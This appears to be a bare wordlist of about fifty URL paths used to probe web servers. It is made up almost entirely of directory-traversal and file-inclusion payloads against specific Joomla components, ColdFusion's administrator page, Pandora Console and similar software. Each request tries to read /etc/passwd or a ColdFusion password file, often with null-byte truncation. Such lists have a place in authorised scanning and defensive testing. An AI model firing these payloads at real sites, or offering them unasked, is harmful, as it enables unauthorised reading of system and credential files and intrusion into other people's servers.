/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/downlot.php?file=../../../../../../../../../../etc/passwd
/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../etc/passwd
/pandora_console/ajax.php?page=../../../../../../etc/passwd
/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
